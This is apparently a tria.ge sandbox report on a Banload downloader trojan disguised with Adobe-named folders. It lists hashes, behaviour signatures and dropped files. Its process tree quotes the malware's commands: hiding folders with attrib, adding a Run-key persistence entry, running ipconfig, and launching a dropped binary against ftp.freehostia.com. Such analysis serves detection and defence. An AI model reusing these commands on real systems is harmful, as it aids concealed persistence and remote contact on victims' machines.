Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

38e3b021f5...18.exe

windows7-x64

8

38e3b021f5...18.exe

windows10-2004-x64

Analysis

  • max time kernel
    10s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/05/2024, 07:13

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe

  • Size

    4.3MB

  • MD5

    38e3b021f5cac0bc19bcdd76f6228771

  • SHA1

    a6f23a56b70ef3ed327277bfec5eaf37d1505d89

  • SHA256

    61540809d55eaa23ba0ac82ff4b530823c93fbc8e7097ccaeb8329e0eb1e48c1

  • SHA512

    cd9504a0b317b9efac96999ee3cd6c4869c97d222149216506c971c2de5144f03969885cbd925797f5fe687d10dcf86abfed7581515131b7051ab0e8b521f222

  • SSDEEP

    98304:YkeMI+e05/Nm5OJumFPtQAcLFNKJ4LowZkh52h0mPtQAYTTN/:e0FNcmdEBNq4Loek7MQvN/

Score
10/10
banloaddownloaderdropperevasionpersistencetrojanupx

Malware Config

Signatures

  • Banload

    Banload variants download malicious files, then install and execute the files.

    trojandropperdownloaderbanload
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Sets file to hidden 1 TTPs 6 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 7 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1368
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4760
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4488
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"
          4⤵
          • Enumerates system info in registry
          PID:3692
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:4532
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1812
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2464
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1404
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:856
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2064
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1616
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4400
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
              Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff
              6⤵
              • Executes dropped EXE
              PID:2624
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "sococsoE" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"
              6⤵
              • Adds Run key to start application
              PID:4048
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              6⤵
              • Gathers network information
              PID:3044
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
              adbr01.exe -f "011.011"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1112
              • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
                adbr01.exe -f "011.011"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Modifies registry class
                PID:1628
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe
              adbr02.exe -f "112.112"
              6⤵
                PID:1928

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\870.afr
      Filesize

      106B

      MD5

      4b474101cde9031b36105bbc0856b8f2

      SHA1

      78120dbc9bf88dd21b9de6c3012ce55c0a88efce

      SHA256

      68ce4767cbde30b24cb244bc56ee938a6de52780fab7012d6c8f859b56b7f0a9

      SHA512

      5ec24355ec7646157904f874da91186fdca3618a6d0034d9454abd4660cba9356ebb4616a19e97ce4d614f25fd70816ea76e3d569ad7a1623330466247330edb

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\Adobeta.exe
      Filesize

      108KB

      MD5

      daeaadb1e509ee3568645b725c7e5029

      SHA1

      2a463493e707e19d6c3444665f696f1e846483d4

      SHA256

      62d34d5206dfc434c5a5713181adbec88ae8dbbf8faa7809edf763dab939aca7

      SHA512

      f74156acaec9b7822fce94eb8115115b40edbb0e4fcabfdf22f6d1bda1c75bc182fe4b874cc0170fbe9414b3e05f593d3c4b71aedece65142ad62e87d2567038

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\BReader.exe
      Filesize

      127KB

      MD5

      12af68f7d332050c34bdd79fcc8970c7

      SHA1

      e99d9858b9dd3f21b22035193c888280ea54030b

      SHA256

      9e3ef05a090bf38988d826efcfafeeac97433745d580faf5e7d162f2fd464d10

      SHA512

      a500004e2b4a4a477a2680b45d72dec8190220a6bcb560c4a758c49c31996b0f950ff98a5edd29ca7215cffa4012a5e384d70953d9efd9b0504d2f90763e7946

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs
      Filesize

      519B

      MD5

      bd641fd8a89df0d37d06e70c1190385b

      SHA1

      519d3f83a3bb15e17e7c39241d7e88224a9088d5

      SHA256

      d71a091be2133db33293d57919a38198dbcd62f14ac4362a9b5813ad118c6fe0

      SHA512

      160c1a27f3897eee99333b9a561d803d8f607d8ec6b0fcb36e09332e4fc0af590d3a5d0ea9481e2da9b0376afca01675fb1a8d41b3b194d60614e7122567ea06

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr01.ght
      Filesize

      2.1MB

      MD5

      0fa6655f07e9fb4530581ed792b5d9a5

      SHA1

      cfb92afe0c03243d94ee1a6c0dd6437f644fb5a2

      SHA256

      13e048a6e41796b9038a55e634d54d2976dfa781fdaa051d635e4303e034536a

      SHA512

      b8be270621176e54cfc98cfaa5d06afedab96a41ec19ab3078b62d85c76faf1f33d449ff26762758f2ac7a78abd7fb1dfb8ee52f6eda310921c76bd5c696618e

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr02.ght
      Filesize

      2.1MB

      MD5

      2bdedc125e74a995b2409d5155b9ea15

      SHA1

      51f1a7b99c6fa5cab61395ef5ce4b98c37648407

      SHA256

      d36b2721aa9a44391ba00d3533906cc481e2e67fbc8169409631614b38171a0d

      SHA512

      22fd2a64cba4efe97c9d661017cff3e4143017e7e0feb75e8c84cf180143616d9d5c6a746914c85e45c0d9e0d87b37d9b4663593e94e2238e8f4ad86e64e5998

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\aijw01.bat
      Filesize

      205B

      MD5

      4a7b39c1281e958c383f4500c3cceb42

      SHA1

      d374728df66cbcf862ac1dee320c4347eeba3fd3

      SHA256

      76a5096de7785bd0e16b2141ce23be096a0fdf687361a1b9cc7e2fc078693c07

      SHA512

      3d64ae760fc89743c4c71f445239c2e10b58b829b79bc28fc66e7bcb6d5f0eed59d1ebce6497586648885f7c5e190caafff167c2e146228783bfae1f7b3f30e7

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat
      Filesize

      923B

      MD5

      7b1fb7ccb83e2be074c8eb5afd7e3675

      SHA1

      89eefff900c60269078d12f5495c4838ccda62e0

      SHA256

      742ef36cbe95b5528c13e001c5040b75bf6aef22299731864318095e87bc4cb4

      SHA512

      a4be580f5c07c7e1d0171ffc2990cf1dd838ca77d7584a3d70bba62b2276bca899d4af22fd0a28dd284c7ec28b1223f551a0ad040cf89d92aa34aa2fb1196eb0

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol03.bat
      Filesize

      1KB

      MD5

      a0eda0c5e3684e57fcd2f68a298b1446

      SHA1

      39e10699ae54cff7bdc4887e54f44f0ac8ced2de

      SHA256

      b063723077544ae58431e6d6d846e95164548180bc829d3d06bd0211a33d47e2

      SHA512

      5bde11ed902768662bf0cdd3a9f96d7d7b3c0d67ced5b29e9aa15b1b52120be1762b279a1a8888f8ba866873c00949d1f08d586aa50224f30391ae9b5181f168

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\nimiki09.vbs
      Filesize

      548B

      MD5

      211f29b36069c5d74bb2fc624e3b750e

      SHA1

      4dde779a3951aae084e147da8f7298d316bb5ab5

      SHA256

      fd80fc307f7ddddb874a38d249d14fcc9fa0ea7add12c37cc49c4337df42eb8d

      SHA512

      ea5fdef56c58a6afbb7f04a1cb5c24054175cf7eea87e636488d4861798b95d2e63378e18c3c5afa03231fab3a15fe674f4d1d4f017dffbe0bc8b4f7836d87be

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\sun.afr
      Filesize

      107B

      MD5

      d18b3077b533ad3c357a5eb91b580fdf

      SHA1

      67a818c98c35dfc03a5218c4920241b1e8c57245

      SHA256

      0996a6841a0d31a6e1051924d6dc3be6588f7297b8c23d6e08d6461c87f1d0ad

      SHA512

      6f6e0acc83d13ebbff0e8cbde53e03704bb4b2da27a18222475a7c366e51ad9cb200e562ed18dc8fc8491af306509af16d4b2eab57fe784aaae16f9a0ed84db5

      Download Submit

    • memory/1112-48-0x0000000000400000-0x00000000006E8000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1112-75-0x0000000000400000-0x00000000006E8000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1628-63-0x0000000000400000-0x00000000006E8000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1628-52-0x0000000000400000-0x00000000006E8000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1628-53-0x0000000002940000-0x0000000002B4C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/1628-57-0x0000000002940000-0x0000000002B4C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/1628-62-0x0000000000400000-0x00000000006E8000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1628-64-0x0000000000400000-0x00000000006E8000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1628-65-0x0000000002940000-0x0000000002B4C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/1628-70-0x0000000002940000-0x0000000002B4C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/1628-74-0x0000000002940000-0x0000000002B4C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2624-43-0x0000000000400000-0x0000000000446000-memory.dmp

      Filesize

      280KB

      Download

    • memory/2624-40-0x0000000000400000-0x0000000000446000-memory.dmp

      Filesize

      280KB

      Download